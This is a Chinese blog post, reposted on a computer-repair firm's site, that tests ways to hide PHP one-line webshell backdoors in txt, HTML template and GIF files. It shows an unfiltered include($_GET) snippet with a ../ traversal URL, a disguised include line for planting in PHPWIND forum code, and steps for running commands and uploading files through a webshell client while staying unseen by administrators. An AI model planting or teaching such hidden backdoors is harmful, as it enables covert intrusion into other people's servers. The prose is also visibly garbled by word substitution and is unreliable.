Php后门的隐藏技巧测试报告

  最近许多朋友都在问我能否能把我那一句话木马隐藏到HTML或图片里，实在把一句话木马插入到PHP文件中就已经很潜伏了，如果说硬是要放到HTML文件或图片里，就接着往下看这篇的篇测试报告吧。要知道如果光把PHP语句放到图片里是无论怎样也不克不及执行的，因为PHP只解析扩展名为php的文件。以是说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的挪用函数 ：include 、require 等。
  我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")如许的语句来挪用隐藏在图片的木马语句。ASP中语句也雷同。看似十分潜伏但间接挪用图片对轻微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方法很难通报参数，这就使得插入木马的功能得不到发挥。
  include 函数在PHP中利用的比较频仍，以是惹起的安全题目也实在太多，例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤惹起的。由此我们就可以结构雷同的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里，可以说潜伏性就更高了。如在PHPWIND论坛里插入下面的语句：<‘’?@include includ/.$PHPWIND_ROOT;? > 一般办理员是无法看出来的。
  有了include 函数来辅助帮助我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等许多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了，下面我们就依次来做测试。
  起首建立一PHP文件test.php 文件内容为:
    $test=$_GET['test'];
  @include 'test/'.$test;
  ?>
  Txt文件一般都是阐明文件，以是我们把一句话木马放到目录的阐明文件里就OK了。任意建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了， 然后把在lanker微型PHP后食客户端 木马地点添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了，执行前往的结果都可以看到。
  对付HTML的文件，一般都为模版文件。为了使插入到HTML的文件的木马能被挪用执行并且不被显示出来，我们可以在HTML里加入一个隐藏属性的文本框 ，如： 然后利用方法同上。执行的前往结果一般都可以检察源文件看到。 如利用检察本步伐目录功效。检察源文件内容为 我可以得到目录为 C:\Uniserver2_7s\www\test。
  下面我们说说图片文件，要说最为毒的一招莫过于把木马隐藏到图片里。我们可以间接对一个图片举行编辑，把插入到图片末端。
  经测试一般都不会对图片形成影响。然后同样方法客户端木马地点添入
  我们检察PHP情况变量 前往的是结果是原图片。
  这里可能要和我们想象的结果有些差距了，实在下令已经运转了，只是前往的结果看不到罢了，因为这是真正的GIF文件，以是是不会显示前往结果的，为了证明能否真的执行了下令我们 执行上传文件下令。果不出所料，文件已经成功上传到办事器上。如许伪造的优点是潜伏性好。缺陷也自然不用说了是没回显。如果你想看到前往的结果，那就拿出记事本伪造一个假的图片文件吧。
  到这里就根本测试完了，怎样潜伏PHP后门就看你本身的选择了。行文仓促，若有不妥之处，请指出！
  作者:lanker    出处:www.securityfaq.org
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：